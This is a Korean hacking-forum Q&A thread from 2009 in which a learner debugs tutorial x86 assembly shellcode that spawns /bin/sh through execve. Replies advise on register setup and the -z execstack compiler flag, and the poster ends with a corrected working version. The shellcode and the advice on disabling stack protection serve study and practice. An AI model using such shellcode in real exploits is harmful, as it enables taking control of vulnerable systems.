프로그래밍

3204,

13/161

movestar

셀코드 만들기에서...

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_programming&no=2035 [복사]

http://hackerschool.org/~research/bbs/data/lecture_member/1070558265/sc_making.txt

여기에서.. 아래 내용중에

.globl main
main:
                jmp     come_here
                // 지난번 강좌 마지막에서 배웠던 테크닉 적용.

func:
                movl    $0x0b, %eax
                // execve의 시스템 콜 번호 11을 %eax에 넣음.

                popl    %ebx
                // "/bin/sh"의 주소를 %ebx에 넣음. (첫째 인자)

                movl    %ebx, (%esi)
                movl    $0x00, 0x4(%esi)
                // 배열 포인터를 구현. ["/bin/sh"의 주소][0]

                leal    (%esi), %ecx
                // 배열 포인터 시작 주소를 %ecx에 넣음. (둘째 인자)

                movl    $0x00, %edx
                // NULL을 넣음. (셋째 인자)

                int     $0x80
                // 시스템 콜 호출 인터럽트 발생

                // 여기서 부터는 exit(0)을 구현한 것.
                movl    $0x01, %eax
                movl    $0x00, %ebx
                int     $0x80

come_here:
                calll func
                .string "/bin/sh\00"

mov    %ebx,(%esi) //배열 포인터를 구현

이부분이

Program received signal SIGSEGV, Segmentation fault.
0x0804835c in func ()

이렇게 세그먼트 오류가 납니다.

FTZ에서는 잘 되는데,,,

이게 원인이 제가 테스트하는 리눅스랑 버전이 틀려서 그런거 같아요

제 리눅스에서 꼭 쉘코드를 만들어 보고싶어요

배열포인터를 구현하는 다른 방법을 써야할 것 같은데 어떻게 해야할 지를 모르겠네요

도움좀 주세요 형님들 굽신굽신

======================================================
[root@vmcentos ~]# uname -a
Linux vmcentos 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:39:21 EDT 2009 i686 i686 i386 GNU/Linux
[root@vmcentos ~]# gcc --version
gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-44)
Copyright (C) 2006 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

------- C 소스 ------
int main()
{
        char *str[2];
        str[0]="/bin/sh";
        str[1]=0;
        execve(str[0], str, 0);
}

------- gcc -static 으로 컴파일한 것을 디스어셈한 내용 ----------

(gdb) disas main
Dump of assembler code for function main:
0x08048228 <main+0>:    lea    0x4(%esp),%ecx
0x0804822c <main+4>:    and    $0xfffffff0,%esp
0x0804822f <main+7>:    pushl  -0x4(%ecx)
0x08048232 <main+10>:   push   %ebp
0x08048233 <main+11>:   mov    %esp,%ebp
0x08048235 <main+13>:   push   %ecx
0x08048236 <main+14>:   sub    $0x24,%esp
0x08048239 <main+17>:   movl   $0x80a134c,-0xc(%ebp)
0x08048240 <main+24>:   movl   $0x0,-0x8(%ebp)
0x08048247 <main+31>:   mov    -0xc(%ebp),%edx
0x0804824a <main+34>:   movl   $0x0,0x8(%esp)
0x08048252 <main+42>:   lea    -0xc(%ebp),%eax
0x08048255 <main+45>:   mov    %eax,0x4(%esp)
0x08048259 <main+49>:   mov    %edx,(%esp)
0x0804825c <main+52>:   call   0x804fed0 <execve>
0x08048261 <main+57>:   add    $0x24,%esp
0x08048264 <main+60>:   pop    %ecx
0x08048265 <main+61>:   pop    %ebp
0x08048266 <main+62>:   lea    -0x4(%ecx),%esp
0x08048269 <main+65>:   ret
End of assembler dump.

더 필요한 정보가 있다면 추가하겠습니다

Hit : 2705 Date : 2009/05/21 04:52


movestar	.globl main main: jmp come_here func: movl $0x0b, %eax popl %ebx add $0x4, %ebx push %ebx movl %esp, %ecx movl $0x00, %edx int $0x80 movl $0x01, %eax movl $0x00, %ebx int $0x80 come_here: call func .string " /bin/sh\00" 이렇게 해서 ecx 에 /bin/sh 를 가리키는 포인터를 넣어서 eax, ebx, ecx, edx에 다 제대로 값을 넣은것 같은데 실행해도 쉘이 안뜨네요.	2009/05/21
ArtHacker7	eax = 0xb edx = 0x0 (세번째인자) ebx = 첫번째인자 "/bin/sh" ecx = 두번째인자 "/bin/sh"+0 글을 자세히 안읽어봐선 모르겠지만 쉘코드 실행하는데 int $0x80이 2번이나 들어갈 필욘 없어요. 인자 4개를 넣어주는 코드와 인터럽트 호출하는 코드 하나만 있으면 쉘코드는 실행됩니다.	2009/05/21
ArtHacker7	ebx ecx에 들어가는건 당연히 시작주소에요...	2009/05/21
sjh21a	스택에 실행 권한이 없는거 같네요 cat /proc/self/maps 해서 stack 에 x 있나 체크 하시고 없으시면 쉘코드 테스트 하실 때gcc 옵션으로 gcc -o a a.c -z execstack 주심 되요	2009/05/22
movestar	스택 권한이 없는것은 맞는데, 잘모르겠지만 상관이 없는거 같아요 소스를 .globl main main: jmp come_here func: movl $0x0b, %eax popl %ebx addl $0x04, %ebx pushl %ebx movl %esp, %ecx movl $0x00, 0x4(%esp) movl $0x00, %edx int $0x80 movl $0x01, %eax movl $0x00, %ebx int $0x80 come_here: call func .string " /bin/sh\00" 이렇게 바꾸고 -z execstack 옵션 준거랑 안준거랑 모두 정상적으로 /bin/sh 가 실행되네요 man execve 에서 argv는 새로운 프로그램은 통과하는 인수 문자열의 배열이다. envp는 진 부 하 게도 key=value형태의 문자열 배열이다. 그것은 새로운 프로그램으로 환 경처럼 전달된다. "argv와 envp는 모두 null포인터에 의해 종료되어야만 한 다." 여기서 null 포인터로 종료되어야 한다... 그래서 c로된 프로그램에서 execve 실행될때 ecx에 저장된 다음 4byte 를 보니까 0x00.. 어셈소스에도 ecx 다음을 0x00으로 하니까 실행이 되네요 잘 안되서 그만둘려고 했는데 윗분들이 관심가져주셔서 끝까지 할 수 있었습니다. 감사합니다~ 강좌보고 한건데 나름 흐뭇하네요 ㅎㅎ	2009/05/22